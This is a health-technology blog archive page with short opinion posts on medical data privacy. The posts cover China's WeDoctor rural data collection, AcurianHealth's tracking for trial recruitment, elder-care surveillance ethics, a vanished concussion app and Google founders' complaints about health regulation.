China’s getting set to be the healthcare AI leader–on the backs of sick, rural citizens’ data privacy

Picture this: a mobile rural health clinic arrives at a rural village in Jia County, in China’s Henan province. The clinic staff check the villagers, many of them elderly and infirm from their hard-working lives. The staff collect vital signs, take blood, urine, ECGs, and other tests. It’s all free, versus going to the hospital 30 miles away.

The catch: the data collected is uploaded to WeDoctor, a private healthcare company specializing in online medical diagnostics and related services that is part of Tencent, the Chinese technology conglomerate which is also devoted to AI. All that data is uploaded to WeDoctor’s AI-powered cloud. The good part: the agreement with the local government that permits this also provides medical services, health insurance, pharmaceuticals and healthcare education to the local people. In addition, it creates a “auxiliary treatment system for general practice” database that Jia County doctors can access for local patients. According to the WIRED article on this, it’s impressive at an IBM Watson level: 

Doctors simply have to input a patient’s symptoms and the system provides them with suggested diagnoses and treatments, calculated from a database of over 5,000 symptoms and 2,000 diseases. WeDoctor claims that the system has an accuracy rate of 90 per cent.

and 

Dr Zhang Qiaofen, in nearby Ren Zhuang village, says the system it has made her life easier. “Since WeDoctor came to my clinic, I feel more comfortable and have more confidence,” she says. “I’m thankful to the device for helping me make decisions.”

The bad part: The patients have no consent or control over the data, nor any privacy restrictions on its use by WeDoctor, Tencent, or the Chinese government. Regional government officials are next pictured in the article reviewing data on Jia County’s citizens: village, gender, age, ailment and whether or not a person has registered with a village health check. Yes, attending these health checks is mandatory for the villagers. 

What is happening is that China is building the world’s largest medical database, free of those pesky Western democracy privacy restrictions, and using AI/machine learning to create a massive set of diagnostic tools. The immediate application is to supplement their paucity of doctors and medical facilities (1.5 doctors per 1,000 people compared to almost double in the UK). All this is being built by an estimated 130 private companies as part of the “Made in China 2025” plan. Long term, the Chinese government gets to know even more intimate details about their 1.3 billion citizens. And these private companies can make money off the data. Such a deal! The difference between China’s attitude towards privacy and Western concerns on same could not be greater.  More on WeDoctor’s ambitions to be the Amazon of healthcare and yes, profit from this data, from Bloomberg. WeDoctor is valued at an incredible $5.5 billion. Hat tip to HISTalk’s Monday morning update.

Creepy data mining on medical conditions runs wild: where’s the privacy?

Ever heard of AcurianHealth? If you are in the US, you may get a letter for one of their research studies or drug trials based upon your prescriptions, your shopping habits, or your internet browsing. Where do they get that data? Quite legitimately, based on consent, Walgreens Boots will mail invitations for studies organized by Acurian to their pharmacy customers, where the user identification is withheld from Acurian. The privacy policy by which Walgreens does business with you permits this type of contact with you. These letters direct users to a generic sounding website for the study–and then life gets interesting. A visit to the site, whether from a letter, a search, or an online ad, may capture your information. There’s a bit of code from a company they work with, NaviStone, that captures information from partial or unsent information requests or signups. NaviStone then matches it up with what you think is anonymous behavior with other databases, and voilá, mail is sent to you via their ‘proprietary technology.’ Acurian uses databases from large data broker/aggregators like Epsilon and cranks away. It’s creepy behavior that stretches the definition of privacy and consent. Not reassuring is that Acurian has a database of over 100 million people who are supposedly opt-ins. How a Company You’ve Never Heard of Sends You Letters about Your Medical Condition (Gizmodo) Hat tip to Toni Bunting

How technology can help fight elder abuse–ethically

The increasing awareness of abuse of older people by their caregivers, whether at home or in care homes/assisted living/nursing homes, invites discussion of the role that technology can play. This presentation by Malcolm J. Fisk, PhD, co-director of the Age Research Centre of Coventry University, in the BSG Ageing Bites series on YouTube looks at technologies viewed by level of control and intrusiveness:

  • Social alarms, which include pull cords (nurse call) and PERS–what we think of as ‘1st generation’ telecare: high level of control, low intrusiveness–but often useless if not reachable in emergency
  • Activity monitoring, which can be room sensor-based or wearable (the 2nd generation): less control, slightly more intrusive–also dependent on monitoring and subject to false positives/negatives
  • Audio and video monitoring, while achieving greater security, are largely uncontrolled by the older person and highly intrusive to the point of unacceptability. (In fact, some feedback on tablet-based telehealth devices indicates that a built-in camera, even if not activated, can be regarded with suspicion and trigger unwanted reactions.)

The issues of consent, and balancing the value of autonomy and privacy versus factors such as cognitive impairment, personal safety and, this Editor would add, detecting attacks by strangers and not caregivers, are explored here. How do we ethically observe yet respect individual privacy? This leads to a set of seven principles Dr Fisk has published on guiding the use of surveillance technologies within care homes in the latest issue of Emerald|Insight (unfortunately abstract access only) Video 11:03Hat tip to Malcolm Fisk via Twitter.

Dr Topol’s prescription for The Future of Medicine, analyzed

The Future of Medicine Is in Your Smartphone sounds like a preface to his latest book, ‘The Patient Will See You Now’, but it is quite consistent with Dr Topol’s talks of late [TTA 5 Dec]. The article is at once optimistic–yes, we love the picture–yet somewhat unreal. When we walk around and kick the tires…

First, it flies in the face of the increasing control of healthcare providers by government as to outcomes and the shift for good or ill to ‘outcomes-based medicine’. Second, ‘doctorless patients’ may need fewer services, not more, and why should these individuals, who represent the high-info elite at least initially, be penalized by having to pay the extremely high premiums dictated by government-approved health insurance (in the US, ACA-compliant insurance a/k/a Obamacare)–or face the US tax penalties for not enrolling in same? Third, those liberating mass market smartwatches and fitness trackers aren’t clinical quality yet–fine directionally, but real clinical diagnosis (more…)

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone…. Our readers know that concussion and diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.”  The plot: it was deactivated without warning or notice by the developer, Inovapp (link to sketchy CrunchBase profile) yet still listed on the iTunes store.

What happened? There was a modified standard (SCAT3) developed in 2012, which updated SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app nor any plans for updating.

The SCAT2 had gained, in a short time, a following among coaches and sports medical professionals because it was the first app based upon the international standard (Zurich, 2008, 3rd International Conference on Concussion in Sport) transferring a paper assessment tool to an easy to use app. In fact, the NHL (National Hockey League) has its own version. The revised 2012 standards  Users have a right to be upset, but moreover, this points to a glaring shortcoming of medical apps–their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards) and one physician’s criticism of apps such as this as a ‘crutch’.  A Pointer to the Future we don’t want to see. The authors Irfan Husain and Iltifat Husain, MD are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)

Eye feels the pain of Google’s Brin and Page

[grow_thumb image=”http://telecareaware.com/wp-content/uploads/2013/02/gimlet-eye.jpg” thumb_width=”150″ /] Oh, the discomfort that Sergey and Larry must be feeling being grilled interviewed by “billionaire venture capitalist Vinod Khosla” (grudgingly respected in TTA 30 May) at one of his eponymous Summits. Here they are with Google Glass in all sorts of adaptations from Parkinson’s to gait improvement to surgery [see multiple TTA articles here], a ‘moonshot on aging and longevity’ dubbed Calico [TTA 19 Sept 13] and even a contact lens to measure blood glucose in tears [TTA 17 Jan]. All good stuff with Big Change potential. Instead they whinge on about how the health field is so regulated, and all the cool stuff you could do with the data but for that privacy thingy (those darn EU, UK regulations and in US, HIPAA). Page to Khosla: “I do worry that we regulate ourselves out of some really great possibilities that are certainly on the data-mining end.” Brin to Khosla: “Generally, health is just so heavily regulated. It’s just a painful business to be in. It’s just not necessarily how I want to spend my time.” Gee. Whiz. What is apparent here is a lack of personal respect for us ‘little folks’ privacy and our everyday, humdrum lives.

Advice straight from The Gimlet Eye: My dear boys, you’ll just have to get people’s data with that old-fashioned thing, permission. (And you’d be surprised that many would be happy to give it to you.) Or if it’s all too painful, Sergey can play with his superyacht, latest girlfriend and follow his estranged wife Anne Wojcicki’s 23andme‘s ongoing dealings with the FDA. At least she’s in the arena. Google leaders think health is ‘a painful business to be in’ (SFGate) Mobihealthnews covers their true confessions, with an interesting veer off in the final third of the article to Mr Khosla’s view of Ginger.io’s surprising pilot with Kaiser and then to WellDoc’s Bluestar diabetes therapy app–the only one that is 510(k)Class II and registered as a pharmaceutical product [TTA 10 Jan].  Also interesting re the Googlers’ mindset is a SFGate blog piece on Larry Page’s attitudes towards leisure and work in a Keynes-redux ‘vision of the future‘. < work + > people may= >leisure, but certainly<<<$£€¥ for even the well-educated and managerial!

Are mHealth apps sharing your data with pharma and insurance companies?

As a further postscript to our recent post on mHealth apps, the Financial Times has just published an article offering a worrying new angle. According to the FT, the “top 20” health & wellness apps are sharing data on you with third parties that, the FT reckons, may include pharmaceutical and insurance companies.

They report that: “Regulations bar the tracking and selling of individuals’ specific medical and  prescription records. Yet some companies are figuring out ways around those  restrictions by building digital health profiles about people based on their use  of the web and mobile apps.”

Perhaps a case of reading those Ts & Cs carefully before pressing ‘accept’?

The amazing lightness of Google’s Being There vs The Private Eye

[grow_thumb image=”http://telecareaware.com/wp-content/uploads/2013/02/gimlet-eye.jpg” thumb_width=”150″ /]Perhaps it is The Google Gimlet Eye’s peevishness at this late hour, but mentioning this company in conjunction with ‘privacy’ lately makes the Eye Goggle. First there is the sheer howling irony of chairman Eric Schmidt’s interesting definition of the Digital Dark Side in this past weekend’s Wall Street Journal, a state of data mining and real-time behavioral monitoring that applies to totalitarian regimes like North Korea, Iran or (more…)